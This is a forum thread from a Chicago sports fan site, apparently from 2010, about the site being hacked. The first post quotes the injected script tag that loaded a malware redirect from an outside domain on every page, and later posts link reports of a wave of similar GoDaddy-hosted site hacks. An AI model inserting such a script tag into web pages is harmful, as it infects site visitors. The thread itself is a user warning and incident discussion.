News:

OK A-holes.  It's fixed.  Enjoy the orange links, because I have no fucking idea how to change them.  I basically learned scripting in four days to fix this damned thing. - Andy

Main Menu

Author Topic: Virus (ANDY SAY RELAX)  ( 6,138 )

Dr. Nguyen Van Falk

  • Fukakke Fan Club
  • Posts: 1,887
Virus (ANDY SAY RELAX)
« on: May 07, 2010, 09:26:24 AM »
The SBox has been abuzz about a script running on the messageboard that redirects some visitors to a virus.

<script src="http://indesignstudioinfo.com/ls.php"></script>

This script is still present on every page of Desipio (messageboard and "articles").

Use the site at your own risk.
WHAT THESE FANCY DANS IN CHICAGO THINK THEY DO?

Dr. Nguyen Van Falk

  • Fukakke Fan Club
  • Posts: 1,887
Re: Virus
« Reply #1 on: May 07, 2010, 09:29:47 AM »
Note: us Macfags are likely safe.
WHAT THESE FANCY DANS IN CHICAGO THINK THEY DO?

Slaky

  • Johnny Evers Fan Club
  • Posts: 7,883
  • Location: Bucktown
Re: Virus
« Reply #2 on: May 07, 2010, 09:48:04 AM »
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 09:29:47 AM
Note: us Macfags are likely safe.

Score one for the yuppies.

Yeti

  • Johnny Evers Fan Club
  • Posts: 4,248
Re: Virus (READ THIS, ASSHOLES)
« Reply #3 on: May 07, 2010, 01:52:08 PM »
That sucked.

Andy

  • Head Moran
  • Administrator
  • Johnny Evers Fan Club
  • Posts: 5,521
Re: Virus (READ THIS, ASSHOLES)
« Reply #4 on: May 07, 2010, 02:46:31 PM »
Now it's fixed.  Holy crap that sucked.

Bort

  • Johnny Evers Fan Club
  • Posts: 4,605
Re: Virus (READ THIS, ASSHOLES)
« Reply #5 on: May 07, 2010, 03:01:16 PM »
Quote from: Andy on May 07, 2010, 02:46:31 PM
Now it's fixed.  Holy crap that sucked.
I blame RV.
"Javier Baez is the stupidest player in Cubs history next to Michael Barrett." Internet Chuck

Chuck to Chuck

  • Johnny Evers Fan Club
  • Posts: 4,831
Re: Virus (READ THIS, ASSHOLES)
« Reply #6 on: May 07, 2010, 03:06:05 PM »
Is it all gone?  The old stuff?

Dr. Nguyen Van Falk

  • Fukakke Fan Club
  • Posts: 1,887
Re: Virus (READ THIS, ASSHOLES)
« Reply #7 on: May 07, 2010, 03:35:43 PM »
Quote from: Chuck to Chuck on May 07, 2010, 03:06:05 PM
Is it all gone?  The old stuff?

Still gone from the published site, yes.*

But, as the old threads got Rattoed sometime before Wednesday morning, that's probably unrelated to this virus business today.

*Though, if Andy somehow happens to have a pre-Ratto datase backup somewhere, Steph's lost Desipio corpus may possibly be recoverable yet.
WHAT THESE FANCY DANS IN CHICAGO THINK THEY DO?

Andy

  • Head Moran
  • Administrator
  • Johnny Evers Fan Club
  • Posts: 5,521
Re: Virus (READ THIS, ASSHOLES)
« Reply #8 on: May 07, 2010, 03:47:35 PM »
I can bring the old posts back.  They're all backed up.  Kind of like Karry Ling.

Chuck to Chuck

  • Johnny Evers Fan Club
  • Posts: 4,831
Re: Virus (READ THIS, ASSHOLES)
« Reply #9 on: May 07, 2010, 03:54:20 PM »
Quote from: Andy on May 07, 2010, 03:47:35 PM
I can bring the old posts back.  They're all backed up.  Kind of like Karry Ling.

Thank god.  I was afraid we lost Dwyer in Cubs body paint.

Dr. Nguyen Van Falk

  • Fukakke Fan Club
  • Posts: 1,887
Re: Virus (all is well, funboys)
« Reply #10 on: May 07, 2010, 06:41:38 PM »
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.
WHAT THESE FANCY DANS IN CHICAGO THINK THEY DO?

CT III

  • Administrator
  • Johnny Evers Fan Club
  • Posts: 3,828
  • Location: NonDescript
Re: Virus (all is well, funboys)
« Reply #11 on: May 07, 2010, 08:02:04 PM »
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 06:41:38 PM
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.

Who the hell would Google Hockeenight?

ChuckD

  • Johnny Evers Fan Club
  • Posts: 2,502
Re: Virus (all is well, funboys)
« Reply #12 on: May 07, 2010, 08:05:53 PM »
Quote from: CT III on May 07, 2010, 08:02:04 PM
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 06:41:38 PM
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.

Who the hell would Google Hockeenight?

http://www.readwriteweb.com/archives/facebook_wants_to_be_your_one_true_loginpage4.php#comments

Wheezer

  • Johnny Evers Fan Club
  • Posts: 3,584
Re: Virus (all is well, funboys)
« Reply #13 on: May 07, 2010, 08:18:39 PM »
Quote from: CT III on May 07, 2010, 08:02:04 PM
Quote from: Dr. Nguyen Van Falk on May 07, 2010, 06:41:38 PM
This hack has apparently been hitting PHP-based GoDaddy sites in waves for a few weeks now...

http://it.slashdot.org/story/10/04/26/1527215/Massive-Number-of-Godaddy-Wordpress-Blogs-Hacked

QuoteThe best part is that the exploit only executes when the traffic is referred by Google, making it the sort of thing that site maintainers won't easily notice. Clever and devious.

I'm curious if those of you who got hit by it today pull up Desipio in the morning via Google.

All indications seem to point to this being a GoDaddy issue, as it's not limited to sites run with Wordpress (though Wordpress has a spotty security history).* And, if the vulnerability wasn't fixed after the attacks a couple weeks ago, there's no guarantee that it's fixed now.

So heads up, HockeeNight.

More, for those who are interested...

http://blogcastfm.com/announcements/warning-massive-number-of-godaddy-wordpress-blogs-hacked-this-weekend/
http://www.neowin.net/forum/topic/897610-godaddy-got-hacked-yesterday/
http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html
http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
http://www.endgamepr.com/blog/2010/04/27/godaddy-fails-crisis-communications-test/
http://www.vagabondinglife.com/godaddy-wordpress-malware/
http://traveljapanblog.com/ashland/2010/05/malware-hack-on-godaddy-com-wordpress-sites/

*Not just GoDaddy. Other hosts are falling victim to similar hacks, too.

Who the hell would Google Hockeenight?

Exactly the point.
"The brain growth deficit controls reality hence [G-d] rules the world.... These mathematical results by the way, are all experimentally confirmed to 2-decimal point accuracy by modern Psychometry data."--George Hammond, Gμν!!

Dr. Nguyen Van Falk

  • Fukakke Fan Club
  • Posts: 1,887
Re: Virus (all is well, funboys)
« Reply #14 on: May 07, 2010, 08:30:18 PM »
Quote from: CT III on May 07, 2010, 08:02:04 PM
Who the hell would Google Hockeenight?

Illiterate Canadians?
WHAT THESE FANCY DANS IN CHICAGO THINK THEY DO?